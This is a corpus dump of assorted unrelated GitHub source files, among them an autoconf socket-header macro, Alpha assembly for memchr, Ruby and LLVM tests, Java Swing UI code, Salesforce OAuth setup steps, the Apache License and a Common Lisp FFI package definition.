text
stringlengths
2
100k
meta
dict
export const bar = 'b ar'
{ "pile_set_name": "Github" }
test: deps go test -race -v ./... export IPFS_API ?= v04x.ipfs.io gx: go get -u github.com/whyrusleeping/gx go get -u github.com/whyrusleeping/gx-go deps: gx gx --verbose install --global gx-go rewrite go get -t ./...
{ "pile_set_name": "Github" }
# sys_socket_h.m4 serial 23 dnl Copyright (C) 2005-2017 Free Software Foundation, Inc. dnl This file is free software; the Free Software Foundation dnl gives unlimited permission to copy and/or distribute it, dnl with or without modifications, as long as this notice is preserved. dnl From Simon Josefsson. AC_DEFUN([gl_HEADER_SYS_SOCKET], [ AC_REQUIRE([gl_SYS_SOCKET_H_DEFAULTS]) AC_REQUIRE([AC_CANONICAL_HOST]) dnl On OSF/1, the functions recv(), send(), recvfrom(), sendto() have dnl old-style declarations (with return type 'int' instead of 'ssize_t') dnl unless _POSIX_PII_SOCKET is defined. case "$host_os" in osf*) AC_DEFINE([_POSIX_PII_SOCKET], [1], [Define to 1 in order to get the POSIX compatible declarations of socket functions.]) ;; esac AC_CACHE_CHECK([whether <sys/socket.h> is self-contained], [gl_cv_header_sys_socket_h_selfcontained], [ AC_COMPILE_IFELSE([AC_LANG_PROGRAM([[#include <sys/socket.h>]], [[]])], [gl_cv_header_sys_socket_h_selfcontained=yes], [gl_cv_header_sys_socket_h_selfcontained=no]) ]) if test $gl_cv_header_sys_socket_h_selfcontained = yes; then dnl If the shutdown function exists, <sys/socket.h> should define dnl SHUT_RD, SHUT_WR, SHUT_RDWR. AC_CHECK_FUNCS([shutdown]) if test $ac_cv_func_shutdown = yes; then AC_CACHE_CHECK([whether <sys/socket.h> defines the SHUT_* macros], [gl_cv_header_sys_socket_h_shut], [ AC_COMPILE_IFELSE( [AC_LANG_PROGRAM([[#include <sys/socket.h>]], [[int a[] = { SHUT_RD, SHUT_WR, SHUT_RDWR };]])], [gl_cv_header_sys_socket_h_shut=yes], [gl_cv_header_sys_socket_h_shut=no]) ]) if test $gl_cv_header_sys_socket_h_shut = no; then SYS_SOCKET_H='sys/socket.h' fi fi fi # We need to check for ws2tcpip.h now. gl_PREREQ_SYS_H_SOCKET AC_CHECK_TYPES([struct sockaddr_storage, sa_family_t],,,[ /* sys/types.h is not needed according to POSIX, but the sys/socket.h in i386-unknown-freebsd4.10 and powerpc-apple-darwin5.5 required it. */ #include <sys/types.h> #ifdef HAVE_SYS_SOCKET_H #include <sys/socket.h> #endif #ifdef HAVE_WS2TCPIP_H #include <ws2tcpip.h> #endif ]) if test $ac_cv_type_struct_sockaddr_storage = no; then HAVE_STRUCT_SOCKADDR_STORAGE=0 fi if test $ac_cv_type_sa_family_t = no; then HAVE_SA_FAMILY_T=0 fi if test $ac_cv_type_struct_sockaddr_storage != no; then AC_CHECK_MEMBERS([struct sockaddr_storage.ss_family], [], [HAVE_STRUCT_SOCKADDR_STORAGE_SS_FAMILY=0], [#include <sys/types.h> #ifdef HAVE_SYS_SOCKET_H #include <sys/socket.h> #endif #ifdef HAVE_WS2TCPIP_H #include <ws2tcpip.h> #endif ]) fi if test $HAVE_STRUCT_SOCKADDR_STORAGE = 0 || test $HAVE_SA_FAMILY_T = 0 \ || test $HAVE_STRUCT_SOCKADDR_STORAGE_SS_FAMILY = 0; then SYS_SOCKET_H='sys/socket.h' fi gl_PREREQ_SYS_H_WINSOCK2 dnl Check for declarations of anything we want to poison if the dnl corresponding gnulib module is not in use. gl_WARN_ON_USE_PREPARE([[ /* Some systems require prerequisite headers. */ #include <sys/types.h> #include <sys/socket.h> ]], [socket connect accept bind getpeername getsockname getsockopt listen recv send recvfrom sendto setsockopt shutdown accept4]) ]) AC_DEFUN([gl_PREREQ_SYS_H_SOCKET], [ dnl Check prerequisites of the <sys/socket.h> replacement. AC_REQUIRE([gl_CHECK_SOCKET_HEADERS]) gl_CHECK_NEXT_HEADERS([sys/socket.h]) if test $ac_cv_header_sys_socket_h = yes; then HAVE_SYS_SOCKET_H=1 HAVE_WS2TCPIP_H=0 else HAVE_SYS_SOCKET_H=0 if test $ac_cv_header_ws2tcpip_h = yes; then HAVE_WS2TCPIP_H=1 else HAVE_WS2TCPIP_H=0 fi fi AC_SUBST([HAVE_SYS_SOCKET_H]) AC_SUBST([HAVE_WS2TCPIP_H]) ]) # Common prerequisites of the <sys/socket.h> replacement and of the # <sys/select.h> replacement. # Sets and substitutes HAVE_WINSOCK2_H. AC_DEFUN([gl_PREREQ_SYS_H_WINSOCK2], [ m4_ifdef([gl_UNISTD_H_DEFAULTS], [AC_REQUIRE([gl_UNISTD_H_DEFAULTS])]) m4_ifdef([gl_SYS_IOCTL_H_DEFAULTS], [AC_REQUIRE([gl_SYS_IOCTL_H_DEFAULTS])]) AC_CHECK_HEADERS_ONCE([sys/socket.h]) if test $ac_cv_header_sys_socket_h != yes; then dnl We cannot use AC_CHECK_HEADERS_ONCE here, because that would make dnl the check for those headers unconditional; yet cygwin reports dnl that the headers are present but cannot be compiled (since on dnl cygwin, all socket information should come from sys/socket.h). AC_CHECK_HEADERS([winsock2.h]) fi if test "$ac_cv_header_winsock2_h" = yes; then HAVE_WINSOCK2_H=1 UNISTD_H_HAVE_WINSOCK2_H=1 SYS_IOCTL_H_HAVE_WINSOCK2_H=1 else HAVE_WINSOCK2_H=0 fi AC_SUBST([HAVE_WINSOCK2_H]) ]) AC_DEFUN([gl_SYS_SOCKET_MODULE_INDICATOR], [ dnl Use AC_REQUIRE here, so that the default settings are expanded once only. AC_REQUIRE([gl_SYS_SOCKET_H_DEFAULTS]) gl_MODULE_INDICATOR_SET_VARIABLE([$1]) dnl Define it also as a C macro, for the benefit of the unit tests. gl_MODULE_INDICATOR_FOR_TESTS([$1]) ]) AC_DEFUN([gl_SYS_SOCKET_H_DEFAULTS], [ GNULIB_SOCKET=0; AC_SUBST([GNULIB_SOCKET]) GNULIB_CONNECT=0; AC_SUBST([GNULIB_CONNECT]) GNULIB_ACCEPT=0; AC_SUBST([GNULIB_ACCEPT]) GNULIB_BIND=0; AC_SUBST([GNULIB_BIND]) GNULIB_GETPEERNAME=0; AC_SUBST([GNULIB_GETPEERNAME]) GNULIB_GETSOCKNAME=0; AC_SUBST([GNULIB_GETSOCKNAME]) GNULIB_GETSOCKOPT=0; AC_SUBST([GNULIB_GETSOCKOPT]) GNULIB_LISTEN=0; AC_SUBST([GNULIB_LISTEN]) GNULIB_RECV=0; AC_SUBST([GNULIB_RECV]) GNULIB_SEND=0; AC_SUBST([GNULIB_SEND]) GNULIB_RECVFROM=0; AC_SUBST([GNULIB_RECVFROM]) GNULIB_SENDTO=0; AC_SUBST([GNULIB_SENDTO]) GNULIB_SETSOCKOPT=0; AC_SUBST([GNULIB_SETSOCKOPT]) GNULIB_SHUTDOWN=0; AC_SUBST([GNULIB_SHUTDOWN]) GNULIB_ACCEPT4=0; AC_SUBST([GNULIB_ACCEPT4]) HAVE_STRUCT_SOCKADDR_STORAGE=1; AC_SUBST([HAVE_STRUCT_SOCKADDR_STORAGE]) HAVE_STRUCT_SOCKADDR_STORAGE_SS_FAMILY=1; AC_SUBST([HAVE_STRUCT_SOCKADDR_STORAGE_SS_FAMILY]) HAVE_SA_FAMILY_T=1; AC_SUBST([HAVE_SA_FAMILY_T]) HAVE_ACCEPT4=1; AC_SUBST([HAVE_ACCEPT4]) ])
{ "pile_set_name": "Github" }
# Setup Salesforce Consumer Key and Secret Salesforce Documentation: [http://www.salesforce.com/us/developer/docs/api_rest/Content/intro_defining_remote_access_applications.htm](http://www.salesforce.com/us/developer/docs/api_rest/Content/intro_defining_remote_access_applications.htm) 1. Create developer account at [developer.salesforce.com](http://developer.salesforce.com) 2. From the Setup page for your develop account, select App Setup > Create > Apps 3. Click New in the Connected Apps section 4. If necessary, create a prefix for your developer account 5. Complete Form using the following information: **App Name**: Full name used to identify app (e.g. Excel Client Example) **API Name**: Unique Id for identifying app (e.g. ExcelClientExample) **Contact Email**: Email used for any app related issues 6. Check Enable OAuth Settings 7. For Callback URL, use https://login.salesforce.com/services/oauth2/callback (The Callback URL is not currently used in the Excel Client so the example value is used) 7. Select the minimal level of OAuth Scope that works for your application and save 8. Copy the Consumer Key and Consumer Secret for the Connected App page
{ "pile_set_name": "Github" }
require_relative '../../spec_helper' require_relative 'fixtures/classes' describe "Module#<" do it "returns true if self is a subclass of or includes the given module" do (ModuleSpecs::Child < ModuleSpecs::Parent).should == true (ModuleSpecs::Child < ModuleSpecs::Basic).should == true (ModuleSpecs::Child < ModuleSpecs::Super).should == true (ModuleSpecs::Super < ModuleSpecs::Basic).should == true end it "returns false if self is a superclass of or included by the given module" do (ModuleSpecs::Parent < ModuleSpecs::Child).should be_false (ModuleSpecs::Basic < ModuleSpecs::Child).should be_false (ModuleSpecs::Super < ModuleSpecs::Child).should be_false (ModuleSpecs::Basic < ModuleSpecs::Super).should be_false end it "returns false if self is the same as the given module" do (ModuleSpecs::Child < ModuleSpecs::Child).should == false (ModuleSpecs::Parent < ModuleSpecs::Parent).should == false (ModuleSpecs::Basic < ModuleSpecs::Basic).should == false (ModuleSpecs::Super < ModuleSpecs::Super).should == false end it "returns nil if self is not related to the given module" do (ModuleSpecs::Parent < ModuleSpecs::Basic).should == nil (ModuleSpecs::Parent < ModuleSpecs::Super).should == nil (ModuleSpecs::Basic < ModuleSpecs::Parent).should == nil (ModuleSpecs::Super < ModuleSpecs::Parent).should == nil end it "raises a TypeError if the argument is not a class/module" do -> { ModuleSpecs::Parent < mock('x') }.should raise_error(TypeError) end end
{ "pile_set_name": "Github" }
/* * arch/alpha/lib/ev6-memchr.S * * 21264 version contributed by Rick Gorton <[email protected]> * * Finds characters in a memory area. Optimized for the Alpha: * * - memory accessed as aligned quadwords only * - uses cmpbge to compare 8 bytes in parallel * - does binary search to find 0 byte in last * quadword (HAKMEM needed 12 instructions to * do this instead of the 9 instructions that * binary search needs). * * For correctness consider that: * * - only minimum number of quadwords may be accessed * - the third argument is an unsigned long * * Much of the information about 21264 scheduling/coding comes from: * Compiler Writer's Guide for the Alpha 21264 * abbreviated as 'CWG' in other comments here * ftp.digital.com/pub/Digital/info/semiconductor/literature/dsc-library.html * Scheduling notation: * E - either cluster * U - upper subcluster; U0 - subcluster U0; U1 - subcluster U1 * L - lower subcluster; L0 - subcluster L0; L1 - subcluster L1 * Try not to change the actual algorithm if possible for consistency. */ .set noreorder .set noat .align 4 .globl memchr .ent memchr memchr: .frame $30,0,$26,0 .prologue 0 # Hack -- if someone passes in (size_t)-1, hoping to just # search til the end of the address space, we will overflow # below when we find the address of the last byte. Given # that we will never have a 56-bit address space, cropping # the length is the easiest way to avoid trouble. zap $18, 0x80, $5 # U : Bound length beq $18, $not_found # U : ldq_u $1, 0($16) # L : load first quadword Latency=3 and $17, 0xff, $17 # E : L L U U : 00000000000000ch insbl $17, 1, $2 # U : 000000000000ch00 cmpult $18, 9, $4 # E : small (< 1 quad) string? or $2, $17, $17 # E : 000000000000chch lda $3, -1($31) # E : U L L U sll $17, 16, $2 # U : 00000000chch0000 addq $16, $5, $5 # E : Max search address or $2, $17, $17 # E : 00000000chchchch sll $17, 32, $2 # U : U L L U : chchchch00000000 or $2, $17, $17 # E : chchchchchchchch extql $1, $16, $7 # U : $7 is upper bits beq $4, $first_quad # U : ldq_u $6, -1($5) # L : L U U L : eight or less bytes to search Latency=3 extqh $6, $16, $6 # U : 2 cycle stall for $6 mov $16, $0 # E : nop # E : or $7, $6, $1 # E : L U L U $1 = quadword starting at $16 # Deal with the case where at most 8 bytes remain to be searched # in $1. E.g.: # $18 = 6 # $1 = ????c6c5c4c3c2c1 $last_quad: negq $18, $6 # E : xor $17, $1, $1 # E : srl $3, $6, $6 # U : $6 = mask of $18 bits set cmpbge $31, $1, $2 # E : L U L U nop nop and $2, $6, $2 # E : beq $2, $not_found # U : U L U L $found_it: #ifdef CONFIG_ALPHA_EV67 /* * Since we are guaranteed to have set one of the bits, we don't * have to worry about coming back with a 0x40 out of cttz... */ cttz $2, $3 # U0 : addq $0, $3, $0 # E : All done nop # E : ret # L0 : L U L U #else /* * Slow and clunky. It can probably be improved. * An exercise left for others. */ negq $2, $3 # E : and $2, $3, $2 # E : and $2, 0x0f, $1 # E : addq $0, 4, $3 # E : cmoveq $1, $3, $0 # E : Latency 2, extra map cycle nop # E : keep with cmov and $2, 0x33, $1 # E : addq $0, 2, $3 # E : U L U L : 2 cycle stall on $0 cmoveq $1, $3, $0 # E : Latency 2, extra map cycle nop # E : keep with cmov and $2, 0x55, $1 # E : addq $0, 1, $3 # E : U L U L : 2 cycle stall on $0 cmoveq $1, $3, $0 # E : Latency 2, extra map cycle nop nop ret # L0 : L U L U #endif # Deal with the case where $18 > 8 bytes remain to be # searched. $16 may not be aligned. .align 4 $first_quad: andnot $16, 0x7, $0 # E : insqh $3, $16, $2 # U : $2 = 0000ffffffffffff ($16<0:2> ff) xor $1, $17, $1 # E : or $1, $2, $1 # E : U L U L $1 = ====ffffffffffff cmpbge $31, $1, $2 # E : bne $2, $found_it # U : # At least one byte left to process. ldq $1, 8($0) # L : subq $5, 1, $18 # E : U L U L addq $0, 8, $0 # E : # Make $18 point to last quad to be accessed (the # last quad may or may not be partial). andnot $18, 0x7, $18 # E : cmpult $0, $18, $2 # E : beq $2, $final # U : U L U L # At least two quads remain to be accessed. subq $18, $0, $4 # E : $4 <- nr quads to be processed and $4, 8, $4 # E : odd number of quads? bne $4, $odd_quad_count # U : # At least three quads remain to be accessed mov $1, $4 # E : L U L U : move prefetched value to correct reg .align 4 $unrolled_loop: ldq $1, 8($0) # L : prefetch $1 xor $17, $4, $2 # E : cmpbge $31, $2, $2 # E : bne $2, $found_it # U : U L U L addq $0, 8, $0 # E : nop # E : nop # E : nop # E : $odd_quad_count: xor $17, $1, $2 # E : ldq $4, 8($0) # L : prefetch $4 cmpbge $31, $2, $2 # E : addq $0, 8, $6 # E : bne $2, $found_it # U : cmpult $6, $18, $6 # E : addq $0, 8, $0 # E : nop # E : bne $6, $unrolled_loop # U : mov $4, $1 # E : move prefetched value into $1 nop # E : nop # E : $final: subq $5, $0, $18 # E : $18 <- number of bytes left to do nop # E : nop # E : bne $18, $last_quad # U : $not_found: mov $31, $0 # E : nop # E : nop # E : ret # L0 : .end memchr
{ "pile_set_name": "Github" }
FROZEN_MACHINE(implode, request/implode, yes,, implode)
{ "pile_set_name": "Github" }
/* Copyright (c) 2015, Apple Inc. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder(s) nor the names of any contributors may be used to endorse or promote products derived from this software without specific prior written permission. No license is granted to the trademarks of the copyright holders even if such marks are included in this software. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ @import UIKit; #import "ORKSurveyAnswerCell.h" NS_ASSUME_NONNULL_BEGIN @interface ORKSurveyAnswerCellForScale : ORKSurveyAnswerCell @end NS_ASSUME_NONNULL_END
{ "pile_set_name": "Github" }
/* * Apache License * Version 2.0, January 2004 * http://www.apache.org/licenses/ * * TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION * * 1. Definitions. * * "License" shall mean the terms and conditions for use, reproduction, * and distribution as defined by Sections 1 through 9 of this document. * * "Licensor" shall mean the copyright owner or entity authorized by * the copyright owner that is granting the License. * * "Legal Entity" shall mean the union of the acting entity and all * other entities that control, are controlled by, or are under common * control with that entity. For the purposes of this definition, * "control" means (i) the power, direct or indirect, to cause the * direction or management of such entity, whether by contract or * otherwise, or (ii) ownership of fifty percent (50%) or more of the * outstanding shares, or (iii) beneficial ownership of such entity. * * "You" (or "Your") shall mean an individual or Legal Entity * exercising permissions granted by this License. * * "Source" form shall mean the preferred form for making modifications, * including but not limited to software source code, documentation * source, and configuration files. * * "Object" form shall mean any form resulting from mechanical * transformation or translation of a Source form, including but * not limited to compiled object code, generated documentation, * and conversions to other media types. * * "Work" shall mean the work of authorship, whether in Source or * Object form, made available under the License, as indicated by a * copyright notice that is included in or attached to the work * (an example is provided in the Appendix below). * * "Derivative Works" shall mean any work, whether in Source or Object * form, that is based on (or derived from) the Work and for which the * editorial revisions, annotations, elaborations, or other modifications * represent, as a whole, an original work of authorship. For the purposes * of this License, Derivative Works shall not include works that remain * separable from, or merely link (or bind by name) to the interfaces of, * the Work and Derivative Works thereof. * * "Contribution" shall mean any work of authorship, including * the original version of the Work and any modifications or additions * to that Work or Derivative Works thereof, that is intentionally * submitted to Licensor for inclusion in the Work by the copyright owner * or by an individual or Legal Entity authorized to submit on behalf of * the copyright owner. For the purposes of this definition, "submitted" * means any form of electronic, verbal, or written communication sent * to the Licensor or its representatives, including but not limited to * communication on electronic mailing lists, source code control systems, * and issue tracking systems that are managed by, or on behalf of, the * Licensor for the purpose of discussing and improving the Work, but * excluding communication that is conspicuously marked or otherwise * designated in writing by the copyright owner as "Not a Contribution." * * "Contributor" shall mean Licensor and any individual or Legal Entity * on behalf of whom a Contribution has been received by Licensor and * subsequently incorporated within the Work. * * 2. Grant of Copyright License. Subject to the terms and conditions of * this License, each Contributor hereby grants to You a perpetual, * worldwide, non-exclusive, no-charge, royalty-free, irrevocable * copyright license to reproduce, prepare Derivative Works of, * publicly display, publicly perform, sublicense, and distribute the * Work and such Derivative Works in Source or Object form. * * 3. Grant of Patent License. Subject to the terms and conditions of * this License, each Contributor hereby grants to You a perpetual, * worldwide, non-exclusive, no-charge, royalty-free, irrevocable * (except as stated in this section) patent license to make, have made, * use, offer to sell, sell, import, and otherwise transfer the Work, * where such license applies only to those patent claims licensable * by such Contributor that are necessarily infringed by their * Contribution(s) alone or by combination of their Contribution(s) * with the Work to which such Contribution(s) was submitted. If You * institute patent litigation against any entity (including a * cross-claim or counterclaim in a lawsuit) alleging that the Work * or a Contribution incorporated within the Work constitutes direct * or contributory patent infringement, then any patent licenses * granted to You under this License for that Work shall terminate * as of the date such litigation is filed. * * 4. Redistribution. You may reproduce and distribute copies of the * Work or Derivative Works thereof in any medium, with or without * modifications, and in Source or Object form, provided that You * meet the following conditions: * * (a) You must give any other recipients of the Work or * Derivative Works a copy of this License; and * * (b) You must cause any modified files to carry prominent notices * stating that You changed the files; and * * (c) You must retain, in the Source form of any Derivative Works * that You distribute, all copyright, patent, trademark, and * attribution notices from the Source form of the Work, * excluding those notices that do not pertain to any part of * the Derivative Works; and * * (d) If the Work includes a "NOTICE" text file as part of its * distribution, then any Derivative Works that You distribute must * include a readable copy of the attribution notices contained * within such NOTICE file, excluding those notices that do not * pertain to any part of the Derivative Works, in at least one * of the following places: within a NOTICE text file distributed * as part of the Derivative Works; within the Source form or * documentation, if provided along with the Derivative Works; or, * within a display generated by the Derivative Works, if and * wherever such third-party notices normally appear. The contents * of the NOTICE file are for informational purposes only and * do not modify the License. You may add Your own attribution * notices within Derivative Works that You distribute, alongside * or as an addendum to the NOTICE text from the Work, provided * that such additional attribution notices cannot be construed * as modifying the License. * * You may add Your own copyright statement to Your modifications and * may provide additional or different license terms and conditions * for use, reproduction, or distribution of Your modifications, or * for any such Derivative Works as a whole, provided Your use, * reproduction, and distribution of the Work otherwise complies with * the conditions stated in this License. * * 5. Submission of Contributions. Unless You explicitly state otherwise, * any Contribution intentionally submitted for inclusion in the Work * by You to the Licensor shall be under the terms and conditions of * this License, without any additional terms or conditions. * Notwithstanding the above, nothing herein shall supersede or modify * the terms of any separate license agreement you may have executed * with Licensor regarding such Contributions. * * 6. Trademarks. This License does not grant permission to use the trade * names, trademarks, service marks, or product names of the Licensor, * except as required for reasonable and customary use in describing the * origin of the Work and reproducing the content of the NOTICE file. * * 7. Disclaimer of Warranty. Unless required by applicable law or * agreed to in writing, Licensor provides the Work (and each * Contributor provides its Contributions) on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or * implied, including, without limitation, any warranties or conditions * of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A * PARTICULAR PURPOSE. You are solely responsible for determining the * appropriateness of using or redistributing the Work and assume any * risks associated with Your exercise of permissions under this License. * * 8. Limitation of Liability. In no event and under no legal theory, * whether in tort (including negligence), contract, or otherwise, * unless required by applicable law (such as deliberate and grossly * negligent acts) or agreed to in writing, shall any Contributor be * liable to You for damages, including any direct, indirect, special, * incidental, or consequential damages of any character arising as a * result of this License or out of the use or inability to use the * Work (including but not limited to damages for loss of goodwill, * work stoppage, computer failure or malfunction, or any and all * other commercial damages or losses), even if such Contributor * has been advised of the possibility of such damages. * * 9. Accepting Warranty or Additional Liability. While redistributing * the Work or Derivative Works thereof, You may choose to offer, * and charge a fee for, acceptance of support, warranty, indemnity, * or other liability obligations and/or rights consistent with this * License. However, in accepting such obligations, You may act only * on Your own behalf and on Your sole responsibility, not on behalf * of any other Contributor, and only if You agree to indemnify, * defend, and hold each Contributor harmless for any liability * incurred by, or claims asserted against, such Contributor by reason * of your accepting any such warranty or additional liability. * * END OF TERMS AND CONDITIONS * * APPENDIX: How to apply the Apache License to your work. * * To apply the Apache License to your work, attach the following * boilerplate notice, with the fields enclosed by brackets "[]" * replaced with your own identifying information. (Don't include * the brackets!) The text should be enclosed in the appropriate * comment syntax for the file format. We also recommend that a * file or class name and description of purpose be included on the * same "printed page" as the copyright notice for easier * identification within third-party archives. * * Copyright [yyyy] [name of copyright owner] * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */
{ "pile_set_name": "Github" }
/* * Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package javax.swing.plaf.metal; import sun.swing.SwingUtilities2; import sun.awt.AppContext; import javax.swing.*; import javax.swing.plaf.*; import javax.swing.plaf.basic.*; import java.awt.*; /** * A Windows L&amp;F implementation of LabelUI. This implementation * is completely static, i.e. there's only one UIView implementation * that's shared by all JLabel objects. * * @author Hans Muller */ public class MetalLabelUI extends BasicLabelUI { /** * The default <code>MetalLabelUI</code> instance. This field might * not be used. To change the default instance use a subclass which * overrides the <code>createUI</code> method, and place that class * name in defaults table under the key "LabelUI". */ protected static MetalLabelUI metalLabelUI = new MetalLabelUI(); private static final Object METAL_LABEL_UI_KEY = new Object(); /** * Returns an instance of {@code MetalLabelUI}. * * @param c a component * @return an instance of {@code MetalLabelUI} */ public static ComponentUI createUI(JComponent c) { if (System.getSecurityManager() != null) { AppContext appContext = AppContext.getAppContext(); MetalLabelUI safeMetalLabelUI = (MetalLabelUI) appContext.get(METAL_LABEL_UI_KEY); if (safeMetalLabelUI == null) { safeMetalLabelUI = new MetalLabelUI(); appContext.put(METAL_LABEL_UI_KEY, safeMetalLabelUI); } return safeMetalLabelUI; } return metalLabelUI; } /** * Just paint the text gray (Label.disabledForeground) rather than * in the labels foreground color. * * @see #paint * @see #paintEnabledText */ protected void paintDisabledText(JLabel l, Graphics g, String s, int textX, int textY) { int mnemIndex = l.getDisplayedMnemonicIndex(); g.setColor(UIManager.getColor("Label.disabledForeground")); SwingUtilities2.drawStringUnderlineCharAt(l, g, s, mnemIndex, textX, textY); } }
{ "pile_set_name": "Github" }
; Test that not specifying a stderr file isn't broken. RUN: unset AFL_DRIVER_STDERR_DUPLICATE_FILENAME RUN: AFLDriverTest ; Test that specifying an invalid file causes a crash. RUN: ASAN_OPTIONS= AFL_DRIVER_STDERR_DUPLICATE_FILENAME="%T" not --crash AFLDriverTest ; Test that a file is created when specified as the duplicate stderr. RUN: AFL_DRIVER_STDERR_DUPLICATE_FILENAME=%t AFLDriverTest RUN: stat %t
{ "pile_set_name": "Github" }
(in-package :defpackage+-user-1) (defpackage+ :autowrap (:use #:cl #:alexandria) (:export ;; Conditions #:autowrap-condition #:autowrap-error #:autowrap-continuable-error #:simple-autowrap-continuable-error #:undefined-foreign-type #:undefined-foreign-type-contextualised #:sffi-condition #:sffi-error #:sffi-continuable-error #:simple-sffi-continuable-error #:invalid-wrapper ;; Wrapper #:wrapper #:anonymous-type #:make-anonymous-type #:make-wrapper #:wrapped-ptr #:wrapper-valid-p #:ptr #:valid-p #:invalidate #:wrap-pointer #:wrapper-null-p #:make-wrapper-instance #:autocollect #:autocollect-cancel #:with-autocollect-cancel #:making-autocollect-instance ;; Autowrap itself #:parse #:parse-file #:*foreign-type-symbol-function* #:*foreign-c-to-lisp-function* #:default-foreign-type-symbol #:default-c-to-lisp ;; SFFI #:foreign-type #:foreign-type-name #:foreign-qualified-name #:basic-foreign-type #:foreign-record #:foreign-record-bit-size #:foreign-record-bit-alignment #:foreign-record-fields #:find-record-field #:foreign-pointer #:foreign-alias #:foreign-array #:foreign-array-size #:foreign-string #:foreign-field #:foreign-record-field #:frf-bitfield-p #:frf-bit-offset #:frf-bit-alignment #:frf-bit-size #:foreign-enum #:foreign-enum-values #:enum-value #:enum-key #:foreign-symbol #:foreign-symbol-c-symbol #:foreign-extern #:foreign-function #:foreign-function-variadic-p #:basic-foreign-type #:foreign-scalar-p #:foreign-type-size #:find-type #:ensure-type #:find-function #:find-extern #:unaliased-type #:builtin-type-p #:define-foreign-alias #:define-foreign-enum #:define-foreign-extern #:define-foreign-function #:define-foreign-record #:define-foreign-type #:define-enum-from-constants #:bitfield-mask #:define-cfun #:define-cextern #:define-accessors #:define-wrapper #:define-wrapper* #:inhibit-string-conversion #:alloc-ptr #:alloc #:calloc-ptr #:calloc #:realloc #:free #:with-alloc #:with-many-alloc #:with-calloc #:c-aptr #:c-aref #:sizeof #:memcpy #:alloc-string #:defcallback #:callback #:get-errno-pointer #:errno #:int8 #:uint8 #:int16 #:uint16 #:int32 #:uint32 #:int64 #:uint64 #:size-t ;; Bitmasks #:define-bitmask #:find-bitmask #:remove-bitmask #:mask-symbol-value #:mask #:mask-apply #:mask-keywords #:define-bitmask-from-constants #:define-bitmask-from-enum ;; Parsing and input #:c-include #:*c2ffi-program* ;; Debug #:*trace-c2ffi* ;; Utility #:asdf-path #:string+)) (defpackage :autowrap.minimal (:documentation "A minimal set of useful symbols for doing common things with autowrap.") (:use) (:import-from :autowrap #:ptr #:invalidate #:enum-value #:enum-key #:mask #:mask-apply #:mask-keywords #:alloc-ptr #:alloc #:calloc-ptr #:calloc #:free #:with-alloc #:with-many-alloc #:with-calloc #:memcpy #:defcallback #:callback #:inhibit-string-conversion #:autocollect #:wrapper-null-p #:sizeof #:autocollect-cancel #:with-autocollect-cancel #:making-autocollect-instance) (:export #:ptr #:invalidate #:enum-value #:enum-key #:mask #:mask-apply #:mask-keywords #:alloc-ptr #:alloc #:calloc-ptr #:calloc #:realloc #:with-alloc #:with-many-alloc #:free #:memcpy #:defcallback #:callback #:inhibit-string-conversion #:autocollect #:wrapper-null-p #:sizeof #:autocollect-cancel #:with-autocollect-cancel #:making-autocollect-instance)) (defpackage+ :autowrap.libffi (:use))
{ "pile_set_name": "Github" }
